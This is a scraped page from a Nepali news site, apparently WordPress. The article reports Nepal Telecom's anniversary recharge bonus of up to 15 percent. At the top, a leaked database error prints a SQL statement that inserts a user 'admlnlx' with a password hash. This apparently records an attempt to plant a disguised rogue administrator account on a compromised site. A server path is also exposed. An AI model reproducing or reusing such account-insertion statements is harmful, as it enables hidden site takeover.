WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BN2DjqaLGIBEZAYmb5AR/N07r0sI8T0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 01:48:10', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
आजदेखि टेलिकमको रिचार्जमा १५ प्रतिशतसम्म बोनस – Gaule Khabar

आजदेखि टेलिकमको रिचार्जमा १५ प्रतिशतसम्म बोनस

आजदेखि टेलिकमको रिचार्जमा १५ प्रतिशतसम्म बोनस

काठमाडौं,माघ २३-

नेपाल टेलिकमले आजदेखि २५ गतेसम्म रिचार्ज गर्दा १५ प्रतिशतसम्म बोनस दिने घोषणा गरेको छ ।

टेलिकमको १३ औं वार्षिक उत्सवको अवसरमा घोषणा गरिएको अफर अनुसार रु ५०, रु १०० र रु २०० को रिचार्जमा १० प्रतिशत बोन दिइने छ भने रु ५०० र रु १००० को रिचार्जमा १५ प्रतिशत बोनस दिइने छ ।

यो योजना एमपीओएस रिचार्ज प्रणालीमा पनि लागू हुनेछ भने बोनस रकम तनि दिनभित्र प्रयोग गरिसक्नु पर्नेछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका